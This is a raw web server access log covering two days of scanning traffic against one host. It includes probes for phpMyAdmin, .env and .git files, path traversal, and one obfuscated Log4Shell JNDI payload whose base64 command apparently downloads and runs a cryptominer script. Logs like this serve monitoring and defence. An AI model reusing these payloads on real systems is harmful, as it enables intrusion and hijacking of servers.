HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:22 -0600] "GET http://67.218.15.25:80/dbadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:22 -0600] "GET http://67.218.15.25:80/mysql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:23 -0600] "GET http://67.218.15.25:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:23 -0600] "GET http://67.218.15.25:80/phpma/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:24 -0600] "GET http://67.218.15.25:80/sqlweb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:24 -0600] "GET http://67.218.15.25:80/webdb/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:25 -0600] "GET http://67.218.15.25:80/websql/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:25 -0600] "GET http://67.218.15.25:80/_phpMyAdmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:26 -0600] "GET http://67.218.15.25:80/php/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:26 -0600] "GET http://67.218.15.25:80/admin/phpmyadmin/scripts/setup.txt HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:27 -0600] "GET http://67.218.15.25:80/db/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:27 -0600] "GET http://67.218.15.25:80/sqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:27 -0600] "GET http://67.218.15.25:80/mysqlmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:28 -0600] "GET http://67.218.15.25:80/phpmanager/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:28 -0600] "GET http://67.218.15.25:80/php-myadmin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:29 -0600] "GET http://67.218.15.25:80/phpmy-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-" 42.192.53.183 - - [25/Dec/2023:04:38:29 -0600] "GET http://67.218.15.25:80/mysql-admin/scripts/setup.php HTTP/1.0" 404 454 "-" "-"

34.31.232.72 - - [25/Dec/2023:05:28:18 -0600] "\x16\x03\x01" 400 0 "-" "-" 34.31.232.72 - - [25/Dec/2023:05:28:19 -0600] "GET /?like=%dimming% HTTP/1.0" 200 260 "-" "-"

107.170.246.45 - - [25/Dec/2023:05:52:40 -0600] "GET /actuator/health HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

165.22.143.70 - - [25/Dec/2023:06:16:57 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"

167.99.111.92 - - [25/Dec/2023:06:16:59 -0600] "POST /wsman HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"

64.227.88.105 - - [25/Dec/2023:06:17:02 -0600] "GET / HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36"

173.230.149.171 - - [25/Dec/2023:06:17:12 -0600] "HEAD / HTTP/1.1" 200 226 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

173.230.149.171 - - [25/Dec/2023:06:17:46 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

206.189.175.215 - - [25/Dec/2023:06:19:07 -0600] "GET / HTTP/1.0" 200 260 "-" "-"

67.205.185.153 - - [25/Dec/2023:06:19:32 -0600] "GET / HTTP/1.0" 200 260 "-" "-" 67.205.185.153 - - [25/Dec/2023:06:19:34 -0600] "Gh0st\xad" 400 0 "-" "-" 67.205.185.153 - - [25/Dec/2023:06:19:37 -0600] "HELP" 400 0 "-" "-" 67.205.185.153 - - [25/Dec/2023:06:19:37 -0600] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc\n" 400 0 "-" "-" 67.205.185.153 - - [25/Dec/2023:06:19:38 -0600] "\x16\x03\x01" 400 0 "-" "-" 67.205.185.153 - - [25/Dec/2023:06:19:40 -0600] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff\n" 400 0 "-" "-"

173.230.149.171 - - [25/Dec/2023:06:20:37 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 173.230.149.171 - - [25/Dec/2023:06:20:37 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36"

88.0.5.93 - - [25/Dec/2023:07:23:20 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

93.123.85.124 - - [25/Dec/2023:09:29:12 -0600] "POST /boaform/admin/formLogin HTTP/1.1" 404 491 "http://67.218.15.25:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"

95.214.53.103 - - [25/Dec/2023:09:59:46 -0600] "GET / HTTP/1.1" 200 260 "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')" "t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//cdn.x4b.lol:3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO}')"

80.66.88.204 - - [25/Dec/2023:10:09:04 -0600] "\x03" 400 0 "-" "-"

62.233.50.179 - - [25/Dec/2023:10:44:19 -0600] "\x03" 400 0 "-" "-"

18.212.147.174 - - [25/Dec/2023:11:08:28 -0600] "GET /gate.php HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

52.81.239.40 - - [25/Dec/2023:11:23:56 -0600] "GET /.DS_Store HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

66.240.236.116 - - [25/Dec/2023:11:36:00 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

209.191.192.102 - - [25/Dec/2023:11:40:30 -0600] "GET / HTTP/1.1" 200 297 "http://67.218.15.8/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0"

192.241.208.66 - - [25/Dec/2023:12:02:22 -0600] "GET /portal/redlion HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x"

205.210.31.43 - - [25/Dec/2023:13:49:46 -0600] "\x16\x03\x01" 400 0 "-" "-" 205.210.31.43 - - [25/Dec/2023:13:49:46 -0600] "\x16\x03\x01" 400 0 "-" "-"

94.102.61.10 - - [25/Dec/2023:14:10:09 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"

20.150.201.61 - - [25/Dec/2023:14:51:01 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [25/Dec/2023:14:51:01 -0600] "GET /api/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [25/Dec/2023:14:51:01 -0600] "GET /laravel/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"

27.147.222.15 - - [25/Dec/2023:15:13:16 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

139.144.213.115 - - [25/Dec/2023:15:37:41 -0600] "CONNECT google.com:443 HTTP/1.1" 405 501 "-" "Go-http-client/1.1"

167.248.133.124 - - [25/Dec/2023:17:12:55 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.248.133.124 - - [25/Dec/2023:17:12:58 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.124 - - [25/Dec/2023:17:12:58 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.248.133.124 - - [25/Dec/2023:17:12:58 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

68.69.186.30 - - [25/Dec/2023:17:28:48 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 68.69.186.30 - - [25/Dec/2023:17:28:48 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

35.203.211.164 - - [25/Dec/2023:18:10:57 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

62.233.50.179 - - [25/Dec/2023:18:27:12 -0600] "\x03" 400 0 "-" "-"

83.97.73.87 - - [25/Dec/2023:19:15:30 -0600] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

52.81.17.152 - - [25/Dec/2023:19:18:42 -0600] "GET /.vscode/sftp.json HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

78.153.140.219 - - [25/Dec/2023:19:22:09 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"

78.153.140.219 - - [25/Dec/2023:19:22:11 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

138.68.208.30 - - [25/Dec/2023:19:23:22 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 zgrab/0.x"

83.97.73.87 - - [25/Dec/2023:20:07:10 -0600] "GET /actuator/gateway/routes HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

117.206.220.137 - - [25/Dec/2023:20:31:35 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

128.14.134.170 - - [25/Dec/2023:20:39:45 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

34.78.6.216 - - [25/Dec/2023:21:03:11 -0600] "GET / HTTP/1.1" 200 297 "-" "python-requests/2.31.0"

192.241.206.15 - - [25/Dec/2023:21:05:00 -0600] "MGLNDD_67.218.15.25_80\n" 400 0 "-" "-"

109.205.213.94 - - [25/Dec/2023:21:07:17 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

20.150.201.61 - - [25/Dec/2023:21:20:17 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [25/Dec/2023:21:20:17 -0600] "GET /api/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 20.150.201.61 - - [25/Dec/2023:21:20:19 -0600] "GET /laravel/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"

68.69.186.30 - - [25/Dec/2023:22:23:54 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 68.69.186.30 - - [25/Dec/2023:22:23:54 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

185.224.128.191 - - [25/Dec/2023:23:05:53 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

198.235.24.9 - - [25/Dec/2023:23:16:41 -0600] "GET / HTTP/1.0" 200 260 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

107.170.237.74 - - [25/Dec/2023:23:38:26 -0600] "GET /hudson HTTP/1.1" 404 435 "-" "Mozilla/5.0 zgrab/0.x" 64.227.34.107 - - [25/Dec/2023:23:53:46 -0600] "\x16\x03\x01\x01\xfb\x01" 400 0 "-" "-"

December 26, 2023

18.234.177.87 - - [26/Dec/2023:00:09:12 -0600] "GET /robots.txt HTTP/1.1" 404 454 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

91.92.243.232 - - [26/Dec/2023:00:14:34 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 91.92.243.232 - - [26/Dec/2023:00:15:10 -0600] "GET ../../proc/ HTTP" 400 0 "-" "-"

14.221.4.32 - - [26/Dec/2023:01:08:57 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 14.221.4.32 - - [26/Dec/2023:01:08:58 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

185.224.128.191 - - [26/Dec/2023:01:09:31 -0600] "GET / HTTP/1.1" 200 260 "http://67.218.15.25:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"

91.92.208.139 - - [26/Dec/2023:01:13:51 -0600] "GET / HTTP/1.0" 200 260 "-" "masscan/1.0 (https://github.com/robertdavidgraham/masscan)"

20.150.201.61 - - [26/Dec/2023:01:26:25 -0600] "GET /_profiler/phpinfo HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"

52.80.126.145 - - [26/Dec/2023:01:43:20 -0600] "GET /.git/config HTTP/1.1" 404 435 "-" "Go-http-client/1.1"

5.22.222.200 - - [26/Dec/2023:02:54:18 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 5.22.222.200 - - [26/Dec/2023:02:54:19 -0600] "GET /api/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0" 5.22.222.200 - - [26/Dec/2023:02:54:19 -0600] "GET /laravel/.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0"

80.79.117.42 - - [26/Dec/2023:03:31:16 -0600] "GET / HTTP/1.0" 200 260 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"

185.224.128.191 - - [26/Dec/2023:03:55:50 -0600] "GET / HTTP/1.1" 200 297 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"

167.94.145.51 - - [26/Dec/2023:04:26:55 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.145.51 - - [26/Dec/2023:04:26:58 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.145.51 - - [26/Dec/2023:04:26:59 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.145.51 - - [26/Dec/2023:04:26:59 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

46.151.250.116 - - [26/Dec/2023:04:35:45 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"

167.94.138.35 - - [26/Dec/2023:04:39:27 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.138.35 - - [26/Dec/2023:04:39:30 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.138.35 - - [26/Dec/2023:04:39:31 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.138.35 - - [26/Dec/2023:04:39:31 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

59.115.92.169 - - [26/Dec/2023:05:42:44 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"

167.94.146.60 - - [26/Dec/2023:06:07:47 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.94.146.60 - - [26/Dec/2023:06:07:50 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.60 - - [26/Dec/2023:06:07:51 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.94.146.60 - - [26/Dec/2023:06:07:51 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

35.216.168.71 - - [26/Dec/2023:06:59:43 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0"

205.210.31.184 - - [26/Dec/2023:07:36:32 -0600] "GET / HTTP/1.1" 200 241 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"

185.224.128.191 - - [26/Dec/2023:08:15:04 -0600] "GET / HTTP/1.1" 200 260 "-" "Linux Gnu (cow)"

167.248.133.127 - - [26/Dec/2023:09:25:47 -0600] "GET / HTTP/1.1" 200 241 "-" "-" 167.248.133.127 - - [26/Dec/2023:09:25:50 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.248.133.127 - - [26/Dec/2023:09:25:50 -0600] "PRI * HTTP/2.0" 400 0 "-" "-" 167.248.133.127 - - [26/Dec/2023:09:25:50 -0600] "GET /favicon.ico HTTP/1.1" 404 454 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"

107.151.182.62 - - [26/Dec/2023:09:28:02 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:14 -0600] "GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:25 -0600] "GET /index.jsp HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:37 -0600] "GET /solr/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:48 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:49 -0600] "HEAD /icons/sphere1.png HTTP/1.1" 200 228 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:49 -0600] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png HTTP/1.1" 400 161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:49 -0600] "HEAD /icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png HTTP/1.1" 400 161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:49 -0600] "HEAD /icons/.%2e/%2e%2e/apache2/icons/sphere1.png HTTP/1.1" 400 161 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:28:49 -0600] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:29:01 -0600] "GET /static/historypage.js HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:29:13 -0600] "GET /favicon-32x32.png HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:29:13 -0600] "GET /sugar_version.json HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:29:24 -0600] "GET /favicon.ico HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:29:35 -0600] "GET /sitecore/shell/sitecore.version.xml HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:29:47 -0600] "GET /showLogin.cc HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:29:56 -0600] "GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:30:07 -0600] "GET /webfig/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:30:16 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:30:16 -0600] "GET /admin/ HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:30:18 -0600] "GET /api/session/properties HTTP/1.1" 404 435 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:30:27 -0600] "GET /favicon.ico HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36" 107.151.182.62 - - [26/Dec/2023:09:30:27 -0600] "GET / HTTP/1.1" 200 241 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"

47.254.25.10 - - [26/Dec/2023:09:35:32 -0600] "GET /Public/home/js/check.js HTTP/1.1" 404 491 "-" "Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36"

78.153.140.221 - - [26/Dec/2023:09:58:28 -0600] "GET /.env HTTP/1.1" 404 491 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 78.153.140.221 - - [26/Dec/2023:09:58:29 -0600] "\x16\x03\x01\x01H\x01" 400 0 "-" "-"

